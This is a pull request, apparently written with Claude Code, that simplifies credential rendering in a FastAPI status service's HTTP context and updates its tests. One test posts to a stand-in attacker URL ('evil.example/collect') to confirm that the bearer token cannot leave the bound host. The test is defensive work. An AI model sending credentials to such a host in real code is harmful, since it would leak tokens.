### PR TITLE
Render a credential one way only

### DIFF
--- a/fastapi-backend/app/services/status/context.py
+++ b/fastapi-backend/app/services/status/context.py
@@ -51,31 +51,17 @@ class _Bound(Protocol):
 
 #: What the runtime hands the factory: the credential already rendered into the
 #: headers that go on the wire (``Bearer`` derives one, ``Basic`` base64-encodes
-#: two, ``Header`` prefixes one), ``None`` for a provider that declares no auth,
-#: or a bare token string as Bearer shorthand. The scheme owns the transform, so
-#: the factory only binds the result; the value passes from runtime to transport
-#: without a provider ever being a party to it.
-ResolvedAuth = str | Mapping[str, str] | None
+#: two, ``Header`` prefixes one), or ``None`` for a provider that declares no
+#: auth. A scheme is the only thing that renders a credential, so there is no
+#: second spelling here for the common case; the factory only binds the result,
+#: and the value passes from runtime to transport without a provider ever being
+#: a party to it.
+ResolvedAuth = Mapping[str, str] | None
 
 #: Built once per provider by the runtime, given the provider and its resolved
 #: auth. The runtime owns credential *resolution and rendering*; the factory owns
 #: *binding* the rendered headers into a transport.
 ContextFactory = Callable[[StatusProvider, ResolvedAuth], Context]
-
-
-def _auth_headers(auth: ResolvedAuth) -> dict[str, str]:
-    """The default headers for a client, from whatever the runtime resolved.
-
-    A ``Mapping`` is already the rendered headers (the scheme did the work); a
-    bare ``str`` is Bearer shorthand for a single opaque token; ``None`` is no
-    auth. The shorthand keeps a plain token a one-liner without routing every
-    caller through a scheme object.
-    """
-    if auth is None:
-        return {}
-    if isinstance(auth, str):
-        return {"Authorization": f"Bearer {auth}"}
-    return dict(auth)
 
 
 DEFAULT_TIMEOUT = timedelta(seconds=10)
@@ -139,9 +125,10 @@ def build_http_context(
     """The default factory: a client bound to ``provider.base_url`` carrying its auth.
 
     ``credential`` is what the runtime resolved for this provider's ``auth``: the
-    rendered headers (a mapping), a bare token as Bearer shorthand, or ``None``.
-    It is passed in rather than read here so credential resolution and rendering
-    stay in one place. A provider that declares no auth is handed an
+    headers the scheme rendered, or ``None`` for no auth. It is passed in rather
+    than read here so credential resolution and rendering stay in one place, and
+    it arrives rendered because a scheme is the only thing that turns a
+    credential into a header. A provider that declares no auth is handed an
     unauthenticated client; the runtime already refuses to call one whose
     declared credentials are missing, so an empty value never reaches this path
     for a provider that needs one.
@@ -151,7 +138,7 @@ def build_http_context(
     while the host refusal stays in the path exactly as in production.
     """
 
-    headers = _auth_headers(credential)
+    headers = dict(credential or {})
     base = httpx.URL(provider.base_url)
     inner = transport or httpx.AsyncHTTPTransport(retries=retries)
     bound = _HostBoundTransport(inner, base.host)

--- a/fastapi-backend/tests/test_status_auth.py
+++ b/fastapi-backend/tests/test_status_auth.py
@@ -95,9 +95,7 @@ class _Wire:
         self.headers = httpx.Headers()
         self.called = False
 
-    def factory(
-        self, provider: StatusProvider, auth: str | Mapping[str, str] | None
-    ) -> HttpContext:
+    def factory(self, provider: StatusProvider, auth: Mapping[str, str] | None) -> HttpContext:
         def handler(request: httpx.Request) -> httpx.Response:
             self.called = True
             self.headers = request.headers

--- a/fastapi-backend/tests/test_status_context.py
+++ b/fastapi-backend/tests/test_status_context.py
@@ -17,6 +17,7 @@ from datetime import timedelta
 import httpx
 import pytest
 
+from app.services.status.auth import Bearer
 from app.services.status.context import (
     HostBoundError,
     _HostBoundTransport,
@@ -27,7 +28,7 @@ from app.services.status.context import (
 class _Provider:
     name = "github"
     base_url = "https://api.github.com"
-    credential = "GITHUB_TOKEN"
+    auth = Bearer("GITHUB_TOKEN")
     max_batch = 50
     ttl = timedelta(minutes=1)
     swr = timedelta(minutes=30)
@@ -39,8 +40,16 @@ class _Provider:
         return []
 
 
+def _rendered(token: str) -> dict[str, str]:
+    """What the runtime hands the factory: headers the scheme already rendered.
+
+    The factory never sees a credential in any other shape, so neither do these.
+    """
+    return dict(_Provider.auth.headers({"GITHUB_TOKEN": token}))
+
+
 def test_the_client_is_bound_to_the_declared_host_and_carries_the_token():
-    ctx = build_http_context(_Provider(), "s3cret")
+    ctx = build_http_context(_Provider(), _rendered("s3cret"))
     client = ctx.http
     assert str(client.base_url) == "https://api.github.com"
     # The token rides in the default headers; the provider is handed the client,
@@ -51,7 +60,7 @@ def test_the_client_is_bound_to_the_declared_host_and_carries_the_token():
 
 def test_a_provider_declaring_no_credential_gets_an_unauthenticated_client():
     class Anon(_Provider):
-        credential = None
+        auth = None
 
     ctx = build_http_context(Anon(), None)
     assert "Authorization" not in ctx.http.headers
@@ -90,7 +99,7 @@ async def test_a_request_to_the_declared_host_passes_through():
 async def test_an_absolute_url_to_a_foreign_host_cannot_carry_the_token_off():
     # The whole point of enforcing the host: a hand-written absolute URL (or a
     # redirect) to another host must not smuggle the Authorization header out.
-    ctx = build_http_context(_Provider(), "s3cret")
+    ctx = build_http_context(_Provider(), _rendered("s3cret"))
     with pytest.raises(HostBoundError):
         await ctx.http.post("https://evil.example/collect", json={})
     await ctx.aclose()


### PR DESCRIPTION
Follow-on to #782. Removes the one thing I asked for in the handoff that turned out to be a mistake.

## The problem

`ResolvedAuth` was `str | Mapping[str, str] | None`, and `_auth_headers` rendered the `str` branch as `Authorization: Bearer <token>` — outside any scheme. So the seam had two ways to turn a credential into a header: the scheme (`Bearer`, `Basic`, `Header`), and the factory itself.

The runtime never used the second one. Every production path resolves through `auth.headers(...)` and hands the factory a `Mapping` or `None`. The only `str` callers in the repo were two lines in `tests/test_status_context.py`.

That file was frozen because my handoff said the host-bound tests had to pass byte-for-byte. Holding the test fixed while the provider contract moved from `credential` to `auth` is what forced the shorthand into production code. The test was the wrong thing to hold fixed.

## The change

- `ResolvedAuth` narrows to `Mapping[str, str] | None`.
- `_auth_headers` goes; the factory is `headers = dict(credential or {})`.
- `test_status_context.py`'s `_Provider` declares `auth = Bearer("GITHUB_TOKEN")` and its two call sites pass `_rendered("s3cret")`, which is literally `Bearer("GITHUB_TOKEN").headers({...})` — the same thing the runtime hands the factory.
- `_Wire.factory` in `test_status_auth.py` drops `str` from its signature to match.

Nothing else moves. `_HostBoundTransport` is untouched and all four host-bound assertions still pass, including the one that drives a real client at `evil.example`.

## On `_Bound`

#782 introduced the `_Bound` protocol (`base_url` only) so the frozen test's `_Provider`, which still said `credential`, wouldn't fail `ty` as a non-`StatusProvider`. That motive is gone now — `_Provider` declares `auth` and is structurally a provider again. I kept `_Bound` anyway: the factory genuinely reads nothing but `base_url`, so typing it that way is accurate rather than a workaround, and it leaves the door open for a caller that wants a bound context without being a provider.

## Gate

```
uv run pytest tests/ -q       → 758 passed, 9 skipped
uv run ruff check .           → All checks passed
uv run ruff format --check .  → 139 files already formatted
uv run ty check .             → All checks passed
```

Docs regenerate with no drift (nothing user-facing described the shorthand).

---
_Generated by [Claude Code](https://claude.ai/code/session_01MC8urhKewoo98gzw3kQMD8)_